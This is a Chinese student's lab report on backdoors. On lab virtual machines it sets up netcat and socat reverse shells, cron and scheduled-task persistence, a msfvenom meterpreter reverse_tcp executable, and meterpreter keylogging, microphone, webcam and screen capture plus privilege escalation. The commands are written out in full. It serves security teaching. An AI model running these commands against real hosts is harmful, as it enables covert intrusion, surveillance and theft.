1. 程式人生 > >Exp2後門原理與實踐 20164312馬孝濤

Exp2後門原理與實踐 20164312馬孝濤

有一個 方式 提權 3.2 控制 傳輸 監聽 web show

實驗內容

    1. 使用netcat獲取主機操作Shell,cron啟動 (0.5分)

    2. 使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分)

    3. 使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)

    4. 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)

    5. 可選加分內容:使用MSF生成shellcode,註入到實踐1中的pwn1中,獲取反彈連接Shell(1分)

任務一:使用netcat獲取主機操作Shell,cron啟動

1.Windows獲得Linux shell

1.1使用ipconfig獲取Windows上的ip地址

技術分享圖片

1.2輸入cd命令,然後將解壓後的ncat文件拖到命令行當中,再輸入ncat.exe -l -p 4312監聽4312端口,等待Linux連接這個端口。

技術分享圖片

1.3在linux中輸入nc 192.168.181.135 4312 -e /bin/sh 反彈連接windows。

技術分享圖片

1.4windows獲得linux的shell後,可執行linux相關的命令,可以自己驗證。

技術分享圖片

2.linux獲得windows shell

2.1在linux中輸入ifconfig查看IP地址。

技術分享圖片

2.2linux中輸入nc -l -p 4312來監聽本地4312端口。

技術分享圖片

2.3在windows中輸入ncat.exe -e cmd.exe 192.168.181.136 4312 來反彈連接linux。

技術分享圖片

2.4在linux中可以看到windows的命令行,獲得windows的shell,可以執行任意指令,輸入ipconfig可以看到我windows虛擬機上的IP地址。

技術分享圖片

3.nc傳輸數據

3.1在windows中輸入ncat.exe -l 4312 來監聽本地4312端口。

技術分享圖片

3.2在linux中輸入nc 192.168.181.135 4312 連接到windows的4312端口。

技術分享圖片

3.3windows和Linux之間就可以實現數據的傳輸了,驗證之。

技術分享圖片技術分享圖片

4.使用ncat獲取主機cron啟動

4.1在windows中輸入ncat.exe -l -p 4312監聽本機4312端口。

技術分享圖片

4.2在Linux中輸入crontab -e 命令來增加一條定時任務。

技術分享圖片

輸入 ‘3‘ 進入vim編輯器:

技術分享圖片

進入vim後按 ‘ i ‘ 進入編輯模式 ,在最後一行輸入 42 * * * * /bin/netcat 192.168.181.135 4312 -e /bin/sh,要求每小時第44分鐘執行後面的指令(此刻時間為42,所以設置為44,方便觀察),最後敲擊 “esc鍵”退出編輯模式並輸入 :wq 保存並退出。tip:在44後在Windows中輸入ls進行驗證。

技術分享圖片

任務二:使用socat獲取主機操作Shell, 任務計劃啟動

1.在windows中,找到“任務計劃”

技術分享圖片

2.在計劃任務程序菜單欄的操作選項中選擇“創建任務”,填寫任務名稱,新建觸發器,開始任務一欄選擇“工作站鎖定時”。

技術分享圖片

3.新建操作

3.1在操作選項中點擊新建:

技術分享圖片

3.2選擇啟動程序為socat.exe

技術分享圖片

tips:添加參數一欄中填寫 tcp-listen:4312 exec:cmd.exe,pty,stderr 其含義為把cmd.exe綁定到4312端口上,並把cmd.exe的stderr重定向到stdou。

4.創建完成後,敲擊“win+L”快捷鍵鎖定計算機,再次打開時,發現彈出一命令行窗口。

技術分享圖片

技術分享圖片

tips:切到計劃程序中發現4312已經正在運行中:

技術分享圖片

5.在kali終端輸入指令 socat - tcp:192.168.181.135:4312

技術分享圖片

任務三:使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

1.在kali上輸入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.181.136 LPORT=4312 -f exe > 20164312_backdoor.exe

技術分享圖片

tips:LHOST是LINUX的IP,因為是windows連接linux然後linux端口反彈。

2.在windows下執行ncat.exe -lv 4312 > 20164312_backdoor.exe此時被控主機進入接收文件模式。

技術分享圖片

3.在Linux下執行nc 192.168.181.135 4312 < 20164312_backdoor.exe

技術分享圖片

技術分享圖片

tips:此時的ip為windows的ip,因為是linux傳送後門軟件給windows。

4.查看user文件夾中是否接收20164312-backdoor.exe文件。

技術分享圖片

5.在linux中輸入msfconsole命令:

技術分享圖片

tips:1.輸入use exploit/multi/handler 使用監聽模塊,設置payload。

   2.輸入set payload windows/meterpreter/reverse_tcp 設置載荷,基於tcp的反向連接反彈windows shell。

   3.輸入set LHOST 192.168.181.136 設置Linux的ip。

   4.輸入set LPORT 4312 設置本機端口。

技術分享圖片

6.輸入show options 查看設置是否正確:

技術分享圖片

7.輸入exploit 運行模塊:

技術分享圖片

8.在Windows中雙擊運行"20164312_backdoor.exe"文件,Linux獲得windows主機連接,並獲得shell:

技術分享圖片

任務四: 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

1.在Linux中輸入record_mic 指令截獲一段音頻:

技術分享圖片

2.使用webcam_snap指令可以使用攝像頭進行拍照:

技術分享圖片

tips:無法找到,這裏是因為我用的是win10的虛擬機,但是win10的虛擬機沒有帶攝像頭,所以無法獲取。

3.使用screenshot指令可以進行截屏:

技術分享圖片

技術分享圖片

4.使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:

技術分享圖片

5.輸入getuid查看當前用戶

技術分享圖片

6.嘗試提權(貌似失敗了)

技術分享圖片

tips:去別的同學那裏偷師學藝知道用管理員身份運行後,成功提權:

技術分享圖片

基礎問題回答

  • (1)例舉你能想到的一個後門進入到你系統中的可能方式?

    瀏覽網頁去下載自己想要的軟件是,可能下載的是被黑客調包了的軟件,下載完成後點擊運行可能就在自己電腦中植入了別人的後門軟件。

  • (2)例舉你知道的後門如何啟動起來(win及linux)的方式?

    windows下可能是被設置成開機自動啟動的類型,Linux下可以是使用cron啟動。

  • (3)Meterpreter有哪些給你映像深刻的功能?

    可以奪取對方主機的控制權限,然後從別人的主機中盜取有用的信息。

  • (4)如何發現自己有系統有沒有被安裝後門?

    下載正版的安全軟件,定期清查電腦。

實驗總結與體會

  這次實驗總的來說是那種我們日常生活中可能會碰到的網絡安全問題,對於這個實驗的掌握和了解能夠幫助我們這些電腦小白盡量的原理可能危害到我們自生的網站、軟件等等,有了這個方面的知識我們在瀏覽網頁和下載軟件是就能更好的避免被懷有不良想法的黑客所攻擊,當然這也讓我對後門這一黑客技術有一個更加深刻的了解,所以說殺毒軟件還是有必要的,不能因為占內存就刪掉了。

Exp2後門原理與實踐 20164312馬孝濤